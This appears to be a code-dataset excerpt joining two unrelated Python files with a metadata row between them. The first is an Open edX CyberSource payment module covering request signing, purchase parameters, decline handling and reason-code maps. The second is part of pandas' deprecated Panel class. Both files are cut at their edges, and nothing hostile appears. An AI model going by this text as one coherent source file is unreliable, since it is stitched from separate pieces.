The params dict should contain a key 'signed_field_names' that is a comma-separated
list of keys in the dictionary. The order of this list is important!
Args:
params (dict): Dictionary of parameters; must include a 'signed_field_names' key
Returns:
dict: The same parameters dict, with a 'signature' key calculated from the other values.
"""
fields = u",".join(params.keys())
params['signed_field_names'] = fields
signed_fields = params.get('signed_field_names', '').split(',')
values = u",".join([u"{0}={1}".format(i, params.get(i, '')) for i in signed_fields])
params['signature'] = processor_hash(values)
params['signed_field_names'] = fields
return params
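
# For illustration (hypothetical values): sign(OrderedDict([('access_key', 'abc'),
# ('amount', '40.00')])) computes the HMAC-SHA256 digest of the string
# "access_key=abc,amount=40.00" using the configured SECRET_KEY, Base64-encodes it
# into params['signature'], and sets signed_field_names to "access_key,amount".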
def render_purchase_form_html(cart, callback_url=None, extra_data=None):
"""
Renders the HTML of the hidden POST form that must be used to initiate a purchase with CyberSource
Args:
cart (Order): The order model representing items in the user's cart.
Keyword Args:
callback_url (unicode): The URL that CyberSource should POST to when the user
completes a purchase. If not provided, then CyberSource will use
the URL provided by the administrator of the account
(CyberSource config, not LMS config).
extra_data (list): Additional data to include as merchant-defined data fields.
Returns:
unicode: The rendered HTML form.
"""
return render_to_string('shoppingcart/cybersource_form.html', {
'action': get_purchase_endpoint(),
'params': get_signed_purchase_params(
cart, callback_url=callback_url, extra_data=extra_data
),
})
def get_signed_purchase_params(cart, callback_url=None, extra_data=None):
"""
This method will return a digitally signed set of CyberSource parameters
Args:
cart (Order): The order model representing items in the user's cart.
Keyword Args:
callback_url (unicode): The URL that CyberSource should POST to when the user
completes a purchase. If not provided, then CyberSource will use
the URL provided by the administrator of the account
(CyberSource config, not LMS config).
extra_data (list): Additional data to include as merchant-defined data fields.
Returns:
dict
"""
return sign(get_purchase_params(cart, callback_url=callback_url, extra_data=extra_data))
def get_purchase_params(cart, callback_url=None, extra_data=None):
"""
This method will build out a dictionary of parameters needed by CyberSource to complete the transaction
Args:
cart (Order): The order model representing items in the user's cart.
Keyword Args:
callback_url (unicode): The URL that CyberSource should POST to when the user
completes a purchase. If not provided, then CyberSource will use
the URL provided by the administrator of the account
(CyberSource config, not LMS config).
extra_data (list): Additional data to include as merchant-defined data fields.
Returns:
dict
"""
total_cost = cart.total_cost
amount = "{0:0.2f}".format(total_cost)
params = OrderedDict()
params['amount'] = amount
params['currency'] = cart.currency
params['orderNumber'] = "OrderId: {0:d}".format(cart.id)
params['access_key'] = get_processor_config().get('ACCESS_KEY', '')
params['profile_id'] = get_processor_config().get('PROFILE_ID', '')
params['reference_number'] = cart.id
params['transaction_type'] = 'sale'
params['locale'] = 'en'
params['signed_date_time'] = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
params['signed_field_names'] = 'access_key,profile_id,amount,currency,transaction_type,reference_number,signed_date_time,locale,transaction_uuid,signed_field_names,unsigned_field_names,orderNumber'
params['unsigned_field_names'] = ''
params['transaction_uuid'] = uuid.uuid4().hex
params['payment_method'] = 'card'
if callback_url is not None:
if isinstance(callback_url, tuple):
callback_url1 = callback_url[0]
callback_url2 = callback_url[1] if len(callback_url) >= 2 else callback_url[0]
else:
callback_url1 = callback_url
callback_url2 = callback_url
params['override_custom_receipt_page'] = callback_url1
params['override_custom_cancel_page'] = callback_url2
if extra_data is not None:
# CyberSource allows us to send additional data in "merchant defined data" fields
for num, item in enumerate(extra_data, start=1):
key = u"merchant_defined_data{num}".format(num=num)
params[key] = item
return params
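# Typical flow, as a sketch (the cart and URL here are hypothetical):
#
#     params = get_signed_purchase_params(
#         cart, callback_url=u'https://lms.example.com/shoppingcart/postpay_callback/'
#     )
#
# The returned dict carries 'signature' and 'signed_field_names' and is
# ready to be POSTed as hidden form fields to get_purchase_endpoint().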
def get_purchase_endpoint():
"""
Return the URL of the payment end-point for CyberSource.
Returns:
unicode
"""
return get_processor_config().get('PURCHASE_ENDPOINT', '')
def _payment_accepted(order_id, auth_amount, currency, decision):
"""
Check that CyberSource has accepted the payment.
Args:
order_id (int): The ID of the order associated with this payment.
auth_amount (Decimal): The amount the user paid using CyberSource.
currency (str): The currency code of the payment.
decision (str): "ACCEPT" if the payment was accepted.
Returns:
dictionary of the form:
{
'accepted': bool,
'amt_charged': Decimal,
'currency': string,
'order': Order
}
Raises:
CCProcessorDataException: The order does not exist.
CCProcessorWrongAmountException: The user did not pay the correct amount.
"""
try:
order = Order.objects.get(id=order_id)
except Order.DoesNotExist:
raise CCProcessorDataException(_("The payment processor accepted an order whose number is not in our system."))
if decision == 'ACCEPT':
if auth_amount == order.total_cost and currency.lower() == order.currency.lower():
return {
'accepted': True,
'amt_charged': auth_amount,
'currency': currency,
'order': order
}
else:
ex = CCProcessorWrongAmountException(
_(
u"The amount charged by the processor {charged_amount} {charged_amount_currency} is different "
u"than the total cost of the order {total_cost} {total_cost_currency}."
).format(
charged_amount=auth_amount,
charged_amount_currency=currency,
total_cost=order.total_cost,
total_cost_currency=order.currency
)
)
ex.order = order
raise ex
else:
return {
'accepted': False,
'amt_charged': 0,
'currency': 'usd',
'order': order
}
def _record_purchase(params, order):
"""
Record the purchase and run purchased_callbacks
Args:
params (dict): The parameters we received from CyberSource.
order (Order): The order associated with this payment.
Returns:
None
"""
# Usually, the credit card number will have the form "xxxxxxxx1234"
# Parse the string to retrieve the digits.
# If we can't find any digits, use placeholder values instead.
ccnum_str = params.get('req_card_number', '')
mm = re.search(r"\d", ccnum_str)
if mm:
ccnum = ccnum_str[mm.start():]
else:
ccnum = "####"
if settings.FEATURES.get("LOG_POSTPAY_CALLBACKS"):
log.info(
"Order %d purchased with params: %s", order.id, json.dumps(params)
)
# Mark the order as purchased and store the billing information
order.purchase(
first=params.get('req_bill_to_forename', ''),
last=params.get('req_bill_to_surname', ''),
street1=params.get('req_bill_to_address_line1', ''),
street2=params.get('req_bill_to_address_line2', ''),
city=params.get('req_bill_to_address_city', ''),
state=params.get('req_bill_to_address_state', ''),
country=params.get('req_bill_to_address_country', ''),
postalcode=params.get('req_bill_to_address_postal_code', ''),
ccnum=ccnum,
cardtype=CARDTYPE_MAP[params.get('req_card_type', '')],
processor_reply_dump=json.dumps(params)
)
def _record_payment_info(params, order):
"""
Record the payment information returned by the processor, without
marking the order as purchased.
Args:
params (dict): The parameters we received from CyberSource.
order (Order): The order associated with this payment.
Returns:
None
"""
if settings.FEATURES.get("LOG_POSTPAY_CALLBACKS"):
log.info(
"Order %d processed (but not completed) with params: %s", order.id, json.dumps(params)
)
order.processor_reply_dump = json.dumps(params)
order.save()
def _get_processor_decline_html(params):
"""
Return HTML indicating that the user's payment was declined.
Args:
params (dict): Parameters we received from CyberSource.
Returns:
unicode: The rendered HTML.
"""
payment_support_email = microsite.get_value('payment_support_email', settings.PAYMENT_SUPPORT_EMAIL)
return _format_error_html(
_(
"Sorry! Our payment processor did not accept your payment. "
"The decision they returned was {decision}, "
"and the reason was {reason}. "
"You were not charged. Please try a different form of payment. "
"Contact us with payment-related questions at {email}."
).format(
decision='<span class="decision">{decision}</span>'.format(decision=params['decision']),
reason='<span class="reason">{reason_code}:{reason_msg}</span>'.format(
reason_code=params['reason_code'],
reason_msg=REASONCODE_MAP.get(params['reason_code'])
),
email=payment_support_email
)
)
def _get_processor_exception_html(exception):
"""
Return HTML indicating that an error occurred.
Args:
exception (CCProcessorException): The exception that occurred.
Returns:
unicode: The rendered HTML.
"""
payment_support_email = microsite.get_value('payment_support_email', settings.PAYMENT_SUPPORT_EMAIL)
if isinstance(exception, CCProcessorDataException):
return _format_error_html(
_(
u"Sorry! Our payment processor sent us back a payment confirmation that had inconsistent data! "
u"We apologize that we cannot verify whether the charge went through and take further action on your order. "
u"The specific error message is: {msg} "
u"Your credit card may possibly have been charged. Contact us with payment-specific questions at {email}."
).format(
msg=u'<span class="exception_msg">{msg}</span>'.format(msg=exception.message),
email=payment_support_email
)
)
elif isinstance(exception, CCProcessorWrongAmountException):
return _format_error_html(
_(
u"Sorry! Due to an error your purchase was charged for a different amount than the order total! "
u"The specific error message is: {msg}. "
u"Your credit card has probably been charged. Contact us with payment-specific questions at {email}."
).format(
msg=u'<span class="exception_msg">{msg}</span>'.format(msg=exception.message),
email=payment_support_email
)
)
elif isinstance(exception, CCProcessorSignatureException):
return _format_error_html(
_(
u"Sorry! Our payment processor sent us back a corrupted message regarding your charge, so we are "
u"unable to validate that the message actually came from the payment processor. "
u"The specific error message is: {msg}. "
u"We apologize that we cannot verify whether the charge went through and take further action on your order. "
u"Your credit card may possibly have been charged. Contact us with payment-specific questions at {email}."
).format(
msg=u'<span class="exception_msg">{msg}</span>'.format(msg=exception.message),
email=payment_support_email
)
)
elif isinstance(exception, CCProcessorUserCancelled):
return _format_error_html(
_(
u"Sorry! Our payment processor sent us back a message saying that you have cancelled this transaction. "
u"The items in your shopping cart will exist for future purchase. "
u"If you feel that this is in error, please contact us with payment-specific questions at {email}."
).format(
email=payment_support_email
)
)
elif isinstance(exception, CCProcessorUserDeclined):
return _format_error_html(
_(
u"We're sorry, but this payment was declined. The items in your shopping cart have been saved. "
u"If you have any questions about this transaction, please contact us at {email}."
).format(
email=payment_support_email
)
)
else:
return _format_error_html(
_(
u"Sorry! Your payment could not be processed because an unexpected exception occurred. "
u"Please contact us at {email} for assistance."
).format(email=payment_support_email)
)
def _format_error_html(msg):
""" Format an HTML error message """
return u'<p class="error_msg">{msg}</p>'.format(msg=msg)
CARDTYPE_MAP = defaultdict(lambda: "UNKNOWN")
CARDTYPE_MAP.update(
{
'001': 'Visa',
'002': 'MasterCard',
'003': 'American Express',
'004': 'Discover',
'005': 'Diners Club',
'006': 'Carte Blanche',
'007': 'JCB',
'014': 'EnRoute',
'021': 'JAL',
'024': 'Maestro',
'031': 'Delta',
'033': 'Visa Electron',
'034': 'Dankort',
'035': 'Laser',
'036': 'Carte Bleue',
'037': 'Carta Si',
'042': 'Maestro Int.',
'043': 'GE Money UK card'
}
)
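# Being a defaultdict, lookups of unmapped codes degrade gracefully:
#
#     CARDTYPE_MAP['001']  # 'Visa'
#     CARDTYPE_MAP['999']  # 'UNKNOWN'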
# Note: these messages come directly from official Cybersource documentation at:
# http://apps.cybersource.com/library/documentation/dev_guides/CC_Svcs_SO_API/html/wwhelp/wwhimpl/js/html/wwhelp.htm#href=reason_codes.html
REASONCODE_MAP = defaultdict(lambda: DEFAULT_REASON)
REASONCODE_MAP.update(
{
'100': _('Successful transaction.'),
'101': _('The request is missing one or more required fields.'),
'102': _('One or more fields in the request contains invalid data.'),
'104': dedent(_(
"""
The merchant reference code for this authorization request matches the merchant reference code of another
authorization request that you sent within the past 15 minutes.
Possible action: Resend the request with a unique merchant reference code.
""")),
'110': _('Only a partial amount was approved.'),
'150': _('General system failure.'),
'151': dedent(_(
"""
The request was received but there was a server timeout. This error does not include timeouts between the
client and the server.
""")),
'152': _('The request was received, but a service did not finish running in time.'),
'200': dedent(_(
"""
The authorization request was approved by the issuing bank but declined by CyberSource
because it did not pass the Address Verification System (AVS).
""")),
'201': dedent(_(
"""
The issuing bank has questions about the request. You do not receive an
authorization code programmatically, but you might receive one verbally by calling the processor.
Possible action: retry with another form of payment.
""")),
'202': dedent(_(
"""
Expired card. You might also receive this if the expiration date you
provided does not match the date the issuing bank has on file.
Possible action: retry with another form of payment.
""")),
'203': dedent(_(
"""
General decline of the card. No other information provided by the issuing bank.
Possible action: retry with another form of payment.
""")),
'204': _('Insufficient funds in the account. Possible action: retry with another form of payment.'),
# 205: stolen or lost card.
'205': _('Stolen or lost card.'),
'207': _('Issuing bank unavailable. Possible action: retry again after a few minutes.'),
'208': dedent(_(
"""
Inactive card or card not authorized for card-not-present transactions.
Possible action: retry with another form of payment.
""")),
'209': _('CVN did not match.'),
'210': _('The card has reached the credit limit. Possible action: retry with another form of payment.'),
'211': _('Invalid card verification number (CVN). Possible action: retry with another form of payment.'),
# 221: the customer matched an entry on the processor's negative file.
'221': _("The customer matched an entry on the processor's negative file."),
'222': _('Account frozen. Possible action: retry with another form of payment.'),
'230': dedent(_(
"""
The authorization request was approved by the issuing bank but declined by
CyberSource because it did not pass the CVN check.
Possible action: retry with another form of payment.
""")),
'231': _('Invalid account number. Possible action: retry with another form of payment.'),
'232': dedent(_(
"""
The card type is not accepted by the payment processor.
Possible action: retry with another form of payment.
""")),
'233': _('General decline by the processor. Possible action: retry with another form of payment.'),
'234': _(
"There is a problem with the information in your CyberSource account. Please let us know at {0}"
).format(settings.PAYMENT_SUPPORT_EMAIL),
'235': _('The requested capture amount exceeds the originally authorized amount.'),
'236': _('Processor Failure. Possible action: retry the payment'),
'237': _('The authorization has already been reversed.'),
'238': _('The authorization has already been captured.'),
'239': _('The requested transaction amount must match the previous transaction amount.'),
'240': dedent(_(
"""
The card type sent is invalid or does not correlate with the credit card number.
Possible action: retry with the same card or another form of payment.
""")),
'241': _('The request ID is invalid.'),
'242': dedent(_(
"""
You requested a capture, but there is no corresponding, unused authorization record. Occurs if there was
not a previously successful authorization request or if the previously successful authorization has already
been used by another capture request.
""")),
'243': _('The transaction has already been settled or reversed.'),
'246': dedent(_(
"""
Either the capture or credit is not voidable because the capture or credit information has already been
submitted to your processor, or you requested a void for a type of transaction that cannot be voided.
""")),
'247': _('You requested a credit for a capture that was previously voided.'),
'250': _('The request was received, but there was a timeout at the payment processor.'),
'254': _('Stand-alone credits are not allowed.'),
'475': _('The cardholder is enrolled for payer authentication'),
'476': _('Payer authentication could not be authenticated'),
'520': dedent(_(
"""
The authorization request was approved by the issuing bank but declined by CyberSource based
on your legacy Smart Authorization settings.
Possible action: retry with a different form of payment.
""")),
}
)
def is_user_payment_error(reason_code):
"""
Decide, based on the reason_code, whether or not it signifies a problem
with something the user did (rather than a system error beyond the user's
control).
This function is used to determine whether we can/should show the user a
message with suggested actions to fix the problem, or simply apologize and
ask her to try again later.
"""
reason_code = str(reason_code)
if reason_code not in REASONCODE_MAP or REASONCODE_MAP[reason_code] == DEFAULT_REASON:
return False
return (200 <= int(reason_code) <= 233) or int(reason_code) in (101, 102, 240)
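# Examples of the classification above:
#
#     is_user_payment_error('204')  # True  -- insufficient funds, user can act
#     is_user_payment_error('151')  # False -- server timeout, not the user's fault
#     is_user_payment_error('999')  # False -- unmapped code, maps to DEFAULT_REASON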
| agpl-3.0 | 1,539,667,478,606,203,000 | 38.3361 | 201 | 0.622222 | false |
GuessWhoSamFoo/pandas | pandas/core/panel.py | 1 | 55911 | """
Contains data structures designed for manipulating panel (3-dimensional) data
"""
# pylint: disable=E1103,W0231,W0212,W0621
from __future__ import division
import warnings
import numpy as np
import pandas.compat as compat
from pandas.compat import OrderedDict, map, range, u, zip
from pandas.compat.numpy import function as nv
from pandas.util._decorators import Appender, Substitution, deprecate_kwarg
from pandas.util._validators import validate_axis_style_args
from pandas.core.dtypes.cast import (
cast_scalar_to_array, infer_dtype_from_scalar, maybe_cast_item)
from pandas.core.dtypes.common import (
is_integer, is_list_like, is_scalar, is_string_like)
from pandas.core.dtypes.missing import notna
import pandas.core.common as com
from pandas.core.frame import DataFrame
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.index import (
Index, MultiIndex, _get_objs_combined_axis, ensure_index)
import pandas.core.indexes.base as ibase
from pandas.core.indexing import maybe_droplevels
from pandas.core.internals import (
BlockManager, create_block_manager_from_arrays,
create_block_manager_from_blocks)
import pandas.core.ops as ops
from pandas.core.reshape.util import cartesian_product
from pandas.core.series import Series
from pandas.io.formats.printing import pprint_thing
_shared_doc_kwargs = dict(
axes='items, major_axis, minor_axis',
klass="Panel",
axes_single_arg="{0, 1, 2, 'items', 'major_axis', 'minor_axis'}",
optional_mapper='', optional_axis='', optional_labels='')
_shared_doc_kwargs['args_transpose'] = (
"three positional arguments: each one of\n{ax_single}".format(
ax_single=_shared_doc_kwargs['axes_single_arg']))
def _ensure_like_indices(time, panels):
"""
Makes sure that time and panels are conformable.
"""
n_time = len(time)
n_panel = len(panels)
u_panels = np.unique(panels) # this sorts!
u_time = np.unique(time)
if len(u_time) == n_time:
time = np.tile(u_time, len(u_panels))
if len(u_panels) == n_panel:
panels = np.repeat(u_panels, len(u_time))
return time, panels
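# Sketch of the conforming behavior: when time is shorter than panels, the
# unique values are tiled/repeated so both come back the same length.
#
#     >>> _ensure_like_indices([1960, 1961], ['A', 'B', 'C'])  # doctest: +SKIP
#     (array([1960, 1961, 1960, 1961, 1960, 1961]),
#      array(['A', 'A', 'B', 'B', 'C', 'C'], dtype=object))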
def panel_index(time, panels, names=None):
"""
Returns a multi-index suitable for a panel-like DataFrame.
Parameters
----------
time : array-like
Time index, does not have to repeat
panels : array-like
Panel index, does not have to repeat
names : list, optional
List containing the names of the indices
Returns
-------
multi_index : MultiIndex
Time index is the first level, the panels are the second level.
Examples
--------
>>> years = range(1960,1963)
>>> panels = ['A', 'B', 'C']
>>> panel_idx = panel_index(years, panels)
>>> panel_idx
MultiIndex([(1960, 'A'), (1961, 'A'), (1962, 'A'), (1960, 'B'),
(1961, 'B'), (1962, 'B'), (1960, 'C'), (1961, 'C'),
(1962, 'C')], dtype=object)
or
>>> years = np.repeat(range(1960,1963), 3)
>>> panels = np.tile(['A', 'B', 'C'], 3)
>>> panel_idx = panel_index(years, panels)
>>> panel_idx
MultiIndex([(1960, 'A'), (1960, 'B'), (1960, 'C'), (1961, 'A'),
(1961, 'B'), (1961, 'C'), (1962, 'A'), (1962, 'B'),
(1962, 'C')], dtype=object)
"""
if names is None:
names = ['time', 'panel']
time, panels = _ensure_like_indices(time, panels)
return MultiIndex.from_arrays([time, panels], sortorder=None, names=names)
class Panel(NDFrame):
"""
Represents wide format panel data, stored as 3-dimensional array.
.. deprecated:: 0.20.0
The recommended way to represent 3-D data are with a MultiIndex on a
DataFrame via the :attr:`~Panel.to_frame()` method or with the
`xarray package <http://xarray.pydata.org/en/stable/>`__.
Pandas provides a :attr:`~Panel.to_xarray()` method to automate this
conversion.
Parameters
----------
data : ndarray (items x major x minor), or dict of DataFrames
items : Index or array-like
axis=0
major_axis : Index or array-like
axis=1
minor_axis : Index or array-like
axis=2
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
dtype : dtype, default None
Data type to force, otherwise infer
"""
@property
def _constructor(self):
return type(self)
_constructor_sliced = DataFrame
def __init__(self, data=None, items=None, major_axis=None, minor_axis=None,
copy=False, dtype=None):
# deprecation GH13563
warnings.warn("\nPanel is deprecated and will be removed in a "
"future version.\nThe recommended way to represent "
"these types of 3-dimensional data are with a "
"MultiIndex on a DataFrame, via the "
"Panel.to_frame() method\n"
"Alternatively, you can use the xarray package "
"http://xarray.pydata.org/en/stable/.\n"
"Pandas provides a `.to_xarray()` method to help "
"automate this conversion.\n",
FutureWarning, stacklevel=3)
self._init_data(data=data, items=items, major_axis=major_axis,
minor_axis=minor_axis, copy=copy, dtype=dtype)
def _init_data(self, data, copy, dtype, **kwargs):
"""
Generate ND initialization; axes are passed
as required objects to __init__.
"""
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
passed_axes = [kwargs.pop(a, None) for a in self._AXIS_ORDERS]
if kwargs:
raise TypeError('_init_data() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
axes = None
if isinstance(data, BlockManager):
if com._any_not_none(*passed_axes):
axes = [x if x is not None else y
for x, y in zip(passed_axes, data.axes)]
mgr = data
elif isinstance(data, dict):
mgr = self._init_dict(data, passed_axes, dtype=dtype)
copy = False
dtype = None
elif isinstance(data, (np.ndarray, list)):
mgr = self._init_matrix(data, passed_axes, dtype=dtype, copy=copy)
copy = False
dtype = None
elif is_scalar(data) and com._all_not_none(*passed_axes):
values = cast_scalar_to_array([len(x) for x in passed_axes],
data, dtype=dtype)
mgr = self._init_matrix(values, passed_axes, dtype=values.dtype,
copy=False)
copy = False
else: # pragma: no cover
raise ValueError('Panel constructor not properly called!')
NDFrame.__init__(self, mgr, axes=axes, copy=copy, dtype=dtype)
def _init_dict(self, data, axes, dtype=None):
haxis = axes.pop(self._info_axis_number)
# prefilter if haxis passed
if haxis is not None:
haxis = ensure_index(haxis)
data = OrderedDict((k, v)
for k, v in compat.iteritems(data)
if k in haxis)
else:
keys = com.dict_keys_to_ordered_list(data)
haxis = Index(keys)
for k, v in compat.iteritems(data):
if isinstance(v, dict):
data[k] = self._constructor_sliced(v)
# extract axis for remaining axes & create the slicemap
raxes = [self._extract_axis(self, data, axis=i) if a is None else a
for i, a in enumerate(axes)]
raxes_sm = self._extract_axes_for_slice(self, raxes)
# shallow copy
arrays = []
haxis_shape = [len(a) for a in raxes]
for h in haxis:
v = values = data.get(h)
if v is None:
values = np.empty(haxis_shape, dtype=dtype)
values.fill(np.nan)
elif isinstance(v, self._constructor_sliced):
d = raxes_sm.copy()
d['copy'] = False
v = v.reindex(**d)
if dtype is not None:
v = v.astype(dtype)
values = v.values
arrays.append(values)
return self._init_arrays(arrays, haxis, [haxis] + raxes)
def _init_arrays(self, arrays, arr_names, axes):
return create_block_manager_from_arrays(arrays, arr_names, axes)
@classmethod
def from_dict(cls, data, intersect=False, orient='items', dtype=None):
"""
Construct Panel from dict of DataFrame objects.
Parameters
----------
data : dict
{field : DataFrame}
intersect : boolean
Intersect indexes of input DataFrames
orient : {'items', 'minor'}, default 'items'
The "orientation" of the data. If the keys of the passed dict
should be the items of the result panel, pass 'items'
(default). Otherwise if the columns of the values of the passed
DataFrame objects should be the items (which in the case of
mixed-dtype data you should do), instead pass 'minor'
dtype : dtype, default None
Data type to force, otherwise infer
Returns
-------
Panel
"""
from collections import defaultdict
orient = orient.lower()
if orient == 'minor':
new_data = defaultdict(OrderedDict)
for col, df in compat.iteritems(data):
for item, s in compat.iteritems(df):
new_data[item][col] = s
data = new_data
elif orient != 'items': # pragma: no cover
raise ValueError('Orientation must be one of {items, minor}.')
d = cls._homogenize_dict(cls, data, intersect=intersect, dtype=dtype)
ks = list(d['data'].keys())
if not isinstance(d['data'], OrderedDict):
ks = list(sorted(ks))
d[cls._info_axis_name] = Index(ks)
return cls(**d)
def __getitem__(self, key):
key = com.apply_if_callable(key, self)
if isinstance(self._info_axis, MultiIndex):
return self._getitem_multilevel(key)
if not (is_list_like(key) or isinstance(key, slice)):
return super(Panel, self).__getitem__(key)
return self.loc[key]
def _getitem_multilevel(self, key):
info = self._info_axis
loc = info.get_loc(key)
if isinstance(loc, (slice, np.ndarray)):
new_index = info[loc]
result_index = maybe_droplevels(new_index, key)
slices = [loc] + [slice(None)] * (self._AXIS_LEN - 1)
new_values = self.values[slices]
d = self._construct_axes_dict(self._AXIS_ORDERS[1:])
d[self._info_axis_name] = result_index
result = self._constructor(new_values, **d)
return result
else:
return self._get_item_cache(key)
def _init_matrix(self, data, axes, dtype=None, copy=False):
values = self._prep_ndarray(self, data, copy=copy)
if dtype is not None:
try:
values = values.astype(dtype)
except Exception:
raise ValueError('failed to cast to '
'{datatype}'.format(datatype=dtype))
shape = values.shape
fixed_axes = []
for i, ax in enumerate(axes):
if ax is None:
ax = ibase.default_index(shape[i])
else:
ax = ensure_index(ax)
fixed_axes.append(ax)
return create_block_manager_from_blocks([values], fixed_axes)
# ----------------------------------------------------------------------
# Comparison methods
def _compare_constructor(self, other, func):
if not self._indexed_same(other):
raise Exception('Can only compare identically-labeled '
'same type objects')
new_data = {col: func(self[col], other[col])
for col in self._info_axis}
d = self._construct_axes_dict(copy=False)
return self._constructor(data=new_data, **d)
# ----------------------------------------------------------------------
# Magic methods
def __unicode__(self):
"""
Return a string representation for a particular Panel.
Invoked by unicode(df) in py2 only.
Yields a Unicode String in both py2/py3.
"""
class_name = str(self.__class__)
dims = u('Dimensions: {dimensions}'.format(dimensions=' x '.join(
["{shape} ({axis})".format(shape=shape, axis=axis) for axis, shape
in zip(self._AXIS_ORDERS, self.shape)])))
def axis_pretty(a):
v = getattr(self, a)
if len(v) > 0:
return u('{ax} axis: {x} to {y}'.format(ax=a.capitalize(),
x=pprint_thing(v[0]),
y=pprint_thing(v[-1])))
else:
return u('{ax} axis: None'.format(ax=a.capitalize()))
output = '\n'.join(
[class_name, dims] + [axis_pretty(a) for a in self._AXIS_ORDERS])
return output
def _get_plane_axes_index(self, axis):
"""
Get the axis names for my plane axes: these are one dimension lower
(as compared with higher level planes), since we are returning the
index/column names for a DataFrame.
"""
axis_name = self._get_axis_name(axis)
if axis_name == 'major_axis':
index = 'minor_axis'
columns = 'items'
elif axis_name == 'minor_axis':
index = 'major_axis'
columns = 'items'
elif axis_name == 'items':
index = 'major_axis'
columns = 'minor_axis'
return index, columns
def _get_plane_axes(self, axis):
"""
Get my plane axes: these are one dimension lower (as compared with
higher level planes), since we are returning the actual axes for a
DataFrame.
"""
return [self._get_axis(axi)
for axi in self._get_plane_axes_index(axis)]
fromDict = from_dict
def to_sparse(self, *args, **kwargs):
"""
NOT IMPLEMENTED: do not call this method, as sparsifying is not
supported for Panel objects and will raise an error.
Convert to SparsePanel.
"""
raise NotImplementedError("sparsifying is not supported "
"for Panel objects")
def to_excel(self, path, na_rep='', engine=None, **kwargs):
"""
Write each DataFrame in Panel to a separate excel sheet.
Parameters
----------
path : string or ExcelWriter object
File path or existing ExcelWriter
na_rep : string, default ''
Missing data representation
engine : string, default None
write engine to use - you can also set this via the options
``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
Other Parameters
----------------
float_format : string, default None
Format string for floating point numbers
cols : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out column names. If a list of string is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow : upper left cell row to dump data frame
startcol : upper left cell column to dump data frame
Notes
-----
Keyword arguments (and na_rep) are passed to the ``to_excel`` method
for each DataFrame written.
"""
from pandas.io.excel import ExcelWriter
if isinstance(path, compat.string_types):
writer = ExcelWriter(path, engine=engine)
else:
writer = path
kwargs['na_rep'] = na_rep
for item, df in self.iteritems():
name = str(item)
df.to_excel(writer, name, **kwargs)
writer.save()
def as_matrix(self):
self._consolidate_inplace()
return self._data.as_array()
# ----------------------------------------------------------------------
# Getting and setting elements
def get_value(self, *args, **kwargs):
"""
Quickly retrieve single value at (item, major, minor) location.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
item : item label (panel item)
major : major axis label (panel item row)
minor : minor axis label (panel item column)
takeable : interpret the passed labels as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(*args, **kwargs)
def _get_value(self, *args, **kwargs):
nargs = len(args)
nreq = self._AXIS_LEN
# require an arg for each axis
if nargs != nreq:
raise TypeError('There must be an argument for each axis, you gave'
' {0} args, but {1} are required'.format(nargs,
nreq))
takeable = kwargs.pop('takeable', None)
if kwargs:
raise TypeError('get_value() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
if takeable is True:
lower = self._iget_item_cache(args[0])
else:
lower = self._get_item_cache(args[0])
return lower._get_value(*args[1:], takeable=takeable)
_get_value.__doc__ = get_value.__doc__
def set_value(self, *args, **kwargs):
"""
Quickly set single value at (item, major, minor) location.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
item : item label (panel item)
major : major axis label (panel item row)
minor : minor axis label (panel item column)
value : scalar
takeable : interpret the passed labels as indexers, default False
Returns
-------
panel : Panel
If label combo is contained, will be reference to calling Panel,
otherwise a new object
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(*args, **kwargs)
def _set_value(self, *args, **kwargs):
# require an arg for each axis and the value
nargs = len(args)
nreq = self._AXIS_LEN + 1
if nargs != nreq:
raise TypeError('There must be an argument for each axis plus the '
'value provided, you gave {0} args, but {1} are '
'required'.format(nargs, nreq))
takeable = kwargs.pop('takeable', None)
if kwargs:
raise TypeError('set_value() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
try:
if takeable is True:
lower = self._iget_item_cache(args[0])
else:
lower = self._get_item_cache(args[0])
lower._set_value(*args[1:], takeable=takeable)
return self
except KeyError:
axes = self._expand_axes(args)
d = self._construct_axes_dict_from(self, axes, copy=False)
result = self.reindex(**d)
args = list(args)
likely_dtype, args[-1] = infer_dtype_from_scalar(args[-1])
made_bigger = not np.array_equal(axes[0], self._info_axis)
# how to make this logic simpler?
if made_bigger:
maybe_cast_item(result, args[0], likely_dtype)
return result._set_value(*args)
_set_value.__doc__ = set_value.__doc__
def _box_item_values(self, key, values):
if self.ndim == values.ndim:
result = self._constructor(values)
# a dup selection will yield a full ndim
if result._get_axis(0).is_unique:
result = result[key]
return result
d = self._construct_axes_dict_for_slice(self._AXIS_ORDERS[1:])
return self._constructor_sliced(values, **d)
def __setitem__(self, key, value):
key = com.apply_if_callable(key, self)
shape = tuple(self.shape)
if isinstance(value, self._constructor_sliced):
value = value.reindex(
**self._construct_axes_dict_for_slice(self._AXIS_ORDERS[1:]))
mat = value.values
elif isinstance(value, np.ndarray):
if value.shape != shape[1:]:
raise ValueError('shape of value must be {0}, shape of given '
'object was {1}'.format(
shape[1:], tuple(map(int, value.shape))))
mat = np.asarray(value)
elif is_scalar(value):
mat = cast_scalar_to_array(shape[1:], value)
else:
raise TypeError('Cannot set item of '
'type: {dtype!s}'.format(dtype=type(value)))
mat = mat.reshape(tuple([1]) + shape[1:])
NDFrame._set_item(self, key, mat)
def _unpickle_panel_compat(self, state): # pragma: no cover
"""
Unpickle the panel.
"""
from pandas.io.pickle import _unpickle_array
_unpickle = _unpickle_array
